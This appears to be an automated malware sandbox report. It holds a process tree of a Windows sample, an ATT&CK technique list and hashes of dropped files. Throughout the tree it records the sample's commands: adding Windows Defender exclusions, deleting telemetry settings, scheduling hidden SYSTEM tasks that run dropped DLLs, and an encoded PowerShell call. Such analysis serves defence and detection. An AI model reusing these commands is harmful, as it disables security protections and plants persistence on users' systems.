    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GcyGSsVYQkTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GcyGSsVYQkTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GsaTYgRyU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GsaTYgRyU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MLgsFiQZVGPFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MLgsFiQZVGPFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SmDRsXLCRkUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SmDRsXLCRkUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pGeDrXImzstVxUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pGeDrXImzstVxUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MznlDUzCYddSWbkv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MznlDUzCYddSWbkv\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3960
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GcyGSsVYQkTU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1452
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GcyGSsVYQkTU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GcyGSsVYQkTU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GsaTYgRyU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GsaTYgRyU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLgsFiQZVGPFC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLgsFiQZVGPFC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SmDRsXLCRkUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SmDRsXLCRkUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pGeDrXImzstVxUVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pGeDrXImzstVxUVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MznlDUzCYddSWbkv /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MznlDUzCYddSWbkv /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1536
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gJIQBNLIO" /SC once /ST 09:56:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4188
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gJIQBNLIO"
  2⤵
  PID:4648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gJIQBNLIO"
  2⤵
  PID:2232
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "vsUaqXwzRclhPPXIZ" /SC once /ST 03:45:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MznlDUzCYddSWbkv\xHsKzigzWsXlZGC\cJDPFsk.exe\" Dr /PYsite_idUPo 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:6088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "vsUaqXwzRclhPPXIZ"
  2⤵
  PID:2464

C:\Users\Admin\AppData\Roaming\htcrjfd
C:\Users\Admin\AppData\Roaming\htcrjfd
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5396

C:\Users\Admin\AppData\Roaming\hccrjfd
C:\Users\Admin\AppData\Roaming\hccrjfd
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4620
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1020

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6128 -ip 6128
1⤵
PID:6132

C:\Windows\Temp\MznlDUzCYddSWbkv\xHsKzigzWsXlZGC\cJDPFsk.exe
C:\Windows\Temp\MznlDUzCYddSWbkv\xHsKzigzWsXlZGC\cJDPFsk.exe Dr /PYsite_idUPo 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5236
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbINNCpbpKlDtqWtmu"
  2⤵
  PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:5772
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:452
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5956
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\GsaTYgRyU\qhimsB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "GpZJAKvqmTHzdqp" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5460
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GpZJAKvqmTHzdqp2" /F /xml "C:\Program Files (x86)\GsaTYgRyU\PDBLUwW.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5844
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "GpZJAKvqmTHzdqp"
  2⤵
  PID:2100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "GpZJAKvqmTHzdqp"
  2⤵
  PID:3144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "oQjwXYOJeQfPXk" /F /xml "C:\Program Files (x86)\GcyGSsVYQkTU2\pYdOIyN.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GQVznwgQXxCuT2" /F /xml "C:\ProgramData\pGeDrXImzstVxUVB\KAkSAct.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rtXNpWVpVbWKYWYJD2" /F /xml "C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR\OvkmNPF.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2888
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "cWTXhWYBnZQKHHARGCa2" /F /xml "C:\Program Files (x86)\MLgsFiQZVGPFC\nDQNuZt.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4792
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "DQnnXGLTfcpIzSAgg" /SC once /ST 08:35:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MznlDUzCYddSWbkv\SwidLDbj\ZtDhlWG.dll\",#1 /Sdsite_idDMe 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2148
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "DQnnXGLTfcpIzSAgg"
  2⤵
  PID:3252
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:1476
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:1344
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:2364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vsUaqXwzRclhPPXIZ"
  2⤵
  PID:4588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2976

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MznlDUzCYddSWbkv\SwidLDbj\ZtDhlWG.dll",#1 /Sdsite_idDMe 525403
1⤵
PID:5684
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MznlDUzCYddSWbkv\SwidLDbj\ZtDhlWG.dll",#1 /Sdsite_idDMe 525403
  2⤵
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:1820
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "DQnnXGLTfcpIzSAgg"
    3⤵
    PID:4412
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 524 -ip 524
1⤵
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5588 -ip 5588
1⤵
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3456 -ip 3456
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4292 -ip 4292
1⤵
PID:5868

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
1⤵
- Modifies system executable filetype association
- Registers COM server for autorun
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
PID:5568

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1992 -ip 1992
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4216 -ip 4216
1⤵
PID:1516

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Enumerates VirtualBox registry keys
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4336 -ip 4336
1⤵
PID:3212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 444 -ip 444
1⤵
PID:2440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3460 -ip 3460
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4912 -ip 4912
1⤵
PID:3704

C:\Windows\System32\5gjc--.exe
"C:\Windows\System32\5gjc--.exe"
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1824 -ip 1824
1⤵
PID:5604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3248 -ip 3248
1⤵
PID:1020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4052 -ip 4052
1⤵
PID:5272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 964 -ip 964
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5944 -ip 5944
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 716 -ip 716
1⤵
PID:2964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 3208 -ip 3208
1⤵
PID:4508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2436 -ip 2436
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5820 -ip 5820
1⤵
PID:3036

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Enumerates VirtualBox registry keys
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2932 -ip 2932
1⤵
PID:2108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4528 -ip 4528
1⤵
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4916 -ip 4916
1⤵
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4376 -ip 4376
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2868 -ip 2868
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5244 -ip 5244
1⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1940 -ip 1940
1⤵
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4948 -ip 4948
1⤵
PID:644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1544 -ip 1544
1⤵
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5084 -ip 5084
1⤵
PID:940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2392 -ip 2392
1⤵
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4960 -ip 4960
1⤵
PID:2132

C:\Users\Admin\Documents\GuardFox\pwZ35FqiU3OeBSS0JTof8T37.exe
"C:\Users\Admin\Documents\GuardFox\pwZ35FqiU3OeBSS0JTof8T37.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1520 -ip 1520
1⤵
PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2904 -ip 2904
1⤵
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5068 -ip 5068
1⤵
PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3904 -ip 3904
1⤵
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4656 -ip 4656
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1908 -ip 1908
1⤵
PID:5304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.1MB

MD5
73103a9d469f22d5e136509ae109109c

SHA1
3c3a5bcf56ca4614e0220edcfb6ab48ad11b2433

SHA256
0ca938810866f4bd11475c20117315dabdfb5553f998506d1ed2ee6d7d74a7b2

SHA512
b9394e57dfc5e30af18429e3aea00e477c58d80353e93d4800a30c76b4a19013db402500125956163dba86586b8f342866d73fa646251e07394efcfd0ed96f40

Download Submit
C:\ProgramData\MailboxNotifier_66\MailboxNotifier_66.exe

Filesize
1.6MB

MD5
93bcb34ff41fb9302a3dbf3f7a759ee2

SHA1
ad2ca7aa6f8f486675ab7dfff69623a88c67ca05

SHA256
24ae78f8f8979e1dff2d42757bd4c6de9f82e58e5f95758b469d47de28a5306e

SHA512
